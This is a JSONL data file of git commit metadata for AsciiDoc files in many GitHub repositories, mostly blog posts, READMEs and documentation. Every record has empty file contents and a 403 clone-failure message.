{"commit":"56b3c1b6c7bf9a64c5e3436fa5bf08fa714d4550","subject":"changes","message":"changes\n","repos":"frans-fuerst\/thinks,frans-fuerst\/thinks,frans-fuerst\/thinks","old_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_file":"content\/available\/2015-04-01-13-mind.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/frans-fuerst\/thinks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2cd2862fac9db95b1aef001cee5245fa7a7aece","subject":"minor rewording of abstract","message":"minor rewording of abstract\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9746a650ef2bfa494e329047445bb5d18f23863c","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 
2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81f8d292f91644a5454918fd49993537cfe115f1","subject":"Mention Andrey Hitrin as a contributor.","message":"Mention Andrey Hitrin as a contributor.\n","repos":"onBass-naga\/geb,ntotomanov-taulia\/geb,onBass-naga\/geb,geb\/geb,ntotomanov-taulia\/geb,geb\/geb","old_file":"doc\/manual\/src\/docs\/asciidoc\/140-project.adoc","new_file":"doc\/manual\/src\/docs\/asciidoc\/140-project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/onBass-naga\/geb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d2462bd305b7bb3bff6805604b9c686d4be65072","subject":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","message":"Update 2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_file":"_posts\/2016-04-11-Un-poco-de-Hardening-parte-I-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"86b5068281f886d357b06d61a5aa6685b2f2e103","subject":"removed axioms (accidentally remained in the draft)","message":"removed axioms (accidentally remained in the draft)\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/concepts\/concepts.asciidoc","new_file":"asciidoc\/concepts\/concepts.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e8fc46eb6958fd14f7964723a90778dcdd1e3e7a","subject":"Update 2015-12-21-Flask-Template.adoc","message":"Update 2015-12-21-Flask-Template.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-12-21-Flask-Template.adoc","new_file":"_posts\/2015-12-21-Flask-Template.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70ba2c666674580d3f1d82b253b4305f2e010f27","subject":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-Im-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-Im-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05bb3f3227e1d2d00a8e68bbb32420a90efbfc17","subject":"Update 2018-12-14-Metabase-K-P-I.adoc","message":"Update 2018-12-14-Metabase-K-P-I.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-14-Metabase-K-P-I.adoc","new_file":"_posts\/2018-12-14-Metabase-K-P-I.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ba4eed87da226cab0586d01e470fc57fd00a8fd8","subject":"CL note: extracting dirname","message":"CL note: extracting dirname\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"aae81efb861e59018c353762581b037c653319d8","subject":"Create sample-file-from-github.adoc","message":"Create sample-file-from-github.adoc","repos":"adoc-editor\/documentation","old_file":"demos\/sample-file-from-github.adoc","new_file":"demos\/sample-file-from-github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adoc-editor\/documentation.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0366bb7c5ded51278f419940c48a8a6861baade9","subject":"Oops, syntax error","message":"Oops, syntax error\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"488faec09efed654077031c009647be329a5832c","subject":"Update 2016-10-12-grunt-es2015.adoc","message":"Update 2016-10-12-grunt-es2015.adoc","repos":"tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr","old_file":"_posts\/2016-10-12-grunt-es2015.adoc","new_file":"_posts\/2016-10-12-grunt-es2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tmdgus0118\/blog.code404.co.kr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fec1ff402f65cd2a0b7b07f3bae6845886139cc7","subject":"Update 2016-11-18-Sass-Awesome.adoc","message":"Update 2016-11-18-Sass-Awesome.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_file":"_posts\/2016-11-18-Sass-Awesome.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c833742dabd76f6df0187bd4a20011ef1db05b6b","subject":"Update 2018-01-29-Whats-up-Flutter-February-2018.adoc","message":"Update 
2018-01-29-Whats-up-Flutter-February-2018.adoc","repos":"triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io,triskell\/triskell.github.io","old_file":"_posts\/2018-01-29-Whats-up-Flutter-February-2018.adoc","new_file":"_posts\/2018-01-29-Whats-up-Flutter-February-2018.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/triskell\/triskell.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5cb425cddc0d1ebc8ebad0632cd0bcca3cd0b7a6","subject":"topic: added time-and-date","message":"topic: added time-and-date\n","repos":"vdmeer\/skb","old_file":"documents\/library\/topic-time-and-date.adoc","new_file":"documents\/library\/topic-time-and-date.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vdmeer\/skb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"df98ad44a7a98a7388daf31f9d6a57e79bbbf53f","subject":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","message":"Update 2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_file":"_posts\/2017-11-21-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-V-P-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"56c0de3825c3c77e0d07ca3fdd5bef1f4c92f40e","subject":"Update 2017-02-11-bring-us-to-your-leader.adoc","message":"Update 2017-02-11-bring-us-to-your-leader.adoc","repos":"thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io,thomaszahr\/thomaszahr.github.io","old_file":"_posts\/2017-02-11-bring-us-to-your-leader.adoc","new_file":"_posts\/2017-02-11-bring-us-to-your-leader.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thomaszahr\/thomaszahr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6667899649f76d74b52f07da6b00a4a738f8bc13","subject":"Description of the roles.","message":"Description of the roles.\n","repos":"uclouvain\/osis,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain","old_file":"doc\/development\/software-process.adoc","new_file":"doc\/development\/software-process.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"a8c8b81d48b7e430ec621c0c371bae76529940b5","subject":"Update 2017-08-01-Test-Page.adoc","message":"Update 
2017-08-01-Test-Page.adoc","repos":"cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io,cringler\/cringler.github.io","old_file":"_posts\/2017-08-01-Test-Page.adoc","new_file":"_posts\/2017-08-01-Test-Page.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cringler\/cringler.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5199ccf3d98a79c19fb1f95050e203f09a70c80","subject":"Add packagement outline","message":"Add packagement outline\n","repos":"ttroy50\/cmake-examples,ttroy50\/cmake-examples,ttroy50\/cmake-examples","old_file":"07-package-management\/README.adoc","new_file":"07-package-management\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ttroy50\/cmake-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f84ae92e519b5c140952fb569f46fb7c1a19b423","subject":"[DOCS] Add X-Pack node settings for Elasticsearch Reference (elastic\/x-pack-elasticsearch#1688)","message":"[DOCS] Add X-Pack node settings for Elasticsearch Reference (elastic\/x-pack-elasticsearch#1688)\n\n* [DOCS] Add X-Pack node settings for Elasticsearch Reference\r\n\r\n* [DOCS] Fix callout in node.asciidoc\r\n\nOriginal commit: elastic\/x-pack-elasticsearch@9c2944173497599b00751a1b94795be9628aa275\n","repos":"scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,vroyer\/elassandra,vroyer\/elassandra,uschindler\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,uschindler\/elasticsearch,HonzaKral\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch","old_file":"docs\/en\/node.asciidoc","new_file":"docs\/en\/node.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"afba35f3b52532f7a6b6b39ca50ea7925c670a0c","subject":"Update 2018-12-22-A-A-R-C-H-I-E-Guide-to-app-architecture.adoc","message":"Update 
2018-12-22-A-A-R-C-H-I-E-Guide-to-app-architecture.adoc","repos":"IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io,IdoramNaed\/idoramnaed.github.io","old_file":"_posts\/2018-12-22-A-A-R-C-H-I-E-Guide-to-app-architecture.adoc","new_file":"_posts\/2018-12-22-A-A-R-C-H-I-E-Guide-to-app-architecture.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/IdoramNaed\/idoramnaed.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fcdc90579b7162b3341ea13185c30716ec99c408","subject":"added readme","message":"added readme\n","repos":"aparnachaudhary\/prototypes,juangon\/prototypes","old_file":"jaxrs-db-access\/README.adoc","new_file":"jaxrs-db-access\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aparnachaudhary\/prototypes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"739b02cdc937d40f86f51c39446959d9052aaf6c","subject":"copied components.adoc from a real project","message":"copied components.adoc from a real project\n","repos":"kontext-e\/uneven-modules","old_file":"jqassistant\/components.adoc","new_file":"jqassistant\/components.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kontext-e\/uneven-modules.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"63246a5e6fef181e62ab7eecbf617f9c1a10a475","subject":"Add missing changes","message":"Add missing changes\n","repos":"mstahv\/framework,mstahv\/framework,mstahv\/framework,Darsstar\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework","old_file":"documentation\/articles\/VaadinScalabilityTestingWithAmazonWebServices.asciidoc","new_file":"documentation\/articles\/VaadinScalabilityTestingWithAmazonWebServices.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b023b3124f49651b05087da37e8cff00aceb36a","subject":"Minor docs fixes","message":"Minor docs fixes\n\nFixed monospace formatting in a couple of places. 
`Phrase` formatting\nhad to be changed to ``letter``.\n\nFixed a few typos.\n","repos":"raphw\/spock,paplorinc\/spock,psideleau\/spock,lokinell\/spock,psideleau\/spock,sebi-hgdata\/spock,alien11689\/spock,siordache\/spock,alien11689\/spock,paplorinc\/spock,paplorinc\/spock,spockframework\/spock,raphw\/spock,sebi-hgdata\/spock,raphw\/spock,leonard84\/spock,psideleau\/spock,siordache\/spock,alien11689\/spock,siordache\/spock,lokinell\/spock,sebi-hgdata\/spock,lokinell\/spock","old_file":"docs\/interaction_based_testing.adoc","new_file":"docs\/interaction_based_testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebi-hgdata\/spock.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1386c0c2e447e0ed91fe5f9bfdf808e7169fe675","subject":"Update 2016-10-09-What-I-like-about-Japan.adoc","message":"Update 2016-10-09-What-I-like-about-Japan.adoc","repos":"endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io","old_file":"_posts\/2016-10-09-What-I-like-about-Japan.adoc","new_file":"_posts\/2016-10-09-What-I-like-about-Japan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d91bbcfcf4212ecad98a9ca16427bbdd5029f18","subject":"Update 2016-07-28-2016-07-28.adoc","message":"Update 2016-07-28-2016-07-28.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-28-2016-07-28.adoc","new_file":"_posts\/2016-07-28-2016-07-28.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e3ae8dffa0fc39a19e1896dcfc6dc914f01c474","subject":"Update 2017-05-16-Faster-IDE.adoc","message":"Update 2017-05-16-Faster-IDE.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16-Faster-IDE.adoc","new_file":"_posts\/2017-05-16-Faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a10cda04e8eff26f91ba374c393f1bee6d5288fc","subject":"Update 2018-07-26-Scratch.adoc","message":"Update 2018-07-26-Scratch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-26-Scratch.adoc","new_file":"_posts\/2018-07-26-Scratch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6471eeb5f23a2a94da9a9918d2ccba1dae7b62d","subject":"Added Aerogear configuration snippets","message":"Added Aerogear configuration 
snippets\n","repos":"pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,metlos\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,objectiser\/hawkular.github.io,jpkrohling\/hawkular.github.io,metlos\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lzoubek\/hawkular.github.io,ppalaga\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,Jiri-Kremser\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,metlos\/hawkular.github.io,lzoubek\/hawkular.github.io,lzoubek\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,ppalaga\/hawkular.github.io,objectiser\/hawkular.github.io,ppalaga\/hawkular.github.io,hawkular\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_file":"src\/main\/jbake\/content\/blog\/2015\/04\/09\/alert-notifiers-for-mobile-devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00d9caaad753bf737e47e4da21d37c3e13eea21b","subject":"Add Code of Conduct","message":"Add Code of Conduct\n","repos":"spring-cloud\/spring-cloud-dataflow-admin-cloudfoundry,markfisher\/spring-cloud-dataflow-admin-cloudfoundry,spring-cloud\/spring-cloud-dataflow-server-cloudfoundry,spring-cloud\/spring-cloud-dataflow-server-cloudfoundry,spring-cloud\/spring-cloud-dataflow-server-cloudfoundry,spring-cloud\/spring-cloud-dataflow-admin-cloudfoundry,markfisher\/spring-cloud-dataflow-admin-cloudfoundry,markfisher\/spring-cloud-dataflow-admin-cloudfoundry,spring-cloud\/spring-cloud-dataflow-admin-cloudfoundry","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-dataflow-server-cloudfoundry.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0f627d1fa5dd824c23897f84512d0851e77a0e9c","subject":"Add code of conduct","message":"Add code of conduct\n","repos":"dtrunk90\/spring-social-facebook,spring-projects\/spring-social-facebook,spring-projects\/spring-social-facebook,dtrunk90\/spring-social-facebook","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a1fa3d240c760874727bb4c1c07065cf0b46bcc3","subject":"Chaged readme to reflect wiki install instructions","message":"Chaged readme to reflect wiki install 
instructions\n","repos":"lillian-lemmer\/hypatia,hypatia-software-org\/hypatia-engine,Applemann\/hypatia,Applemann\/hypatia,hypatia-software-org\/hypatia-engine,brechin\/hypatia,lillian-lemmer\/hypatia,brechin\/hypatia","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lillian-lemmer\/hypatia.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2585877aa0ed949ef19dcd7e7e9e93fe7fe71dd","subject":"Moving to asciidoc","message":"Moving to asciidoc\n","repos":"kurron\/jvm-development-environment,kurron\/jvm-development-environment","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kurron\/jvm-development-environment.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c7225d27b548be0ef7b0d6906de64265a77d7415","subject":"[doc] More IDs + use NOTES for \"since\" informations","message":"[doc] More IDs + use NOTES for \"since\" informations\n","repos":"netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin,netceler\/pipeline-maven-plugin,jenkinsci\/pipeline-maven-plugin","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/netceler\/pipeline-maven-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d8cf6c16fbb7ca4166676a9626ecec57f336168","subject":"Create README.adoc","message":"Create README.adoc","repos":"asciidoctor\/docker-asciidoctorj","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidoctor\/docker-asciidoctorj.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"767dec2e04f19259c1867d5146aa3bda40bab408","subject":"Beg someone to make GUI in readme","message":"Beg someone to make GUI in readme\n","repos":"lassik\/extract,lassik\/extract","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lassik\/extract.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"65d8b2fa30fe24918c54b93bbc0b67c010f19d09","subject":"Better in-doc reference","message":"Better in-doc reference\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a3e4b411e1c872cf5b2169afa19c2fe4cd4d08f2","subject":"CL: Add \"Retriving argument list of a function\"","message":"CL: Add \"Retriving argument list of a function\"\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"fc4ebea253483edce4c5041420eecb33d8e1c7be","subject":"add clojurex","message":"add 
clojurex\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/clojurex.adoc","new_file":"content\/events\/2019\/clojurex.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"5de7099e7fcf8a610a7a6a1dffe3cd55d2fc778d","subject":"add README.md","message":"add README.md\n","repos":"marzelwidmer\/angular-springboot,marzelwidmer\/angular-springboot,marzelwidmer\/angular-springboot,marzelwidmer\/angular-springboot,marzelwidmer\/angular-springboot","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marzelwidmer\/angular-springboot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10d318031726f143764c38101feabfda34b6439a","subject":"add success stories content","message":"add success stories content\n","repos":"clojure\/clojure-site","old_file":"content\/community\/success_stories.adoc","new_file":"content\/community\/success_stories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"91b78bfedbb6e92acc0cdfb314ab45879337c025","subject":"Update 2015-04-17-React.adoc","message":"Update 2015-04-17-React.adoc","repos":"hatohato25\/hatohato25.github.io,hatohato25\/hatohato25.github.io,hatohato25\/hatohato25.github.io","old_file":"_posts\/2015-04-17-React.adoc","new_file":"_posts\/2015-04-17-React.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hatohato25\/hatohato25.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 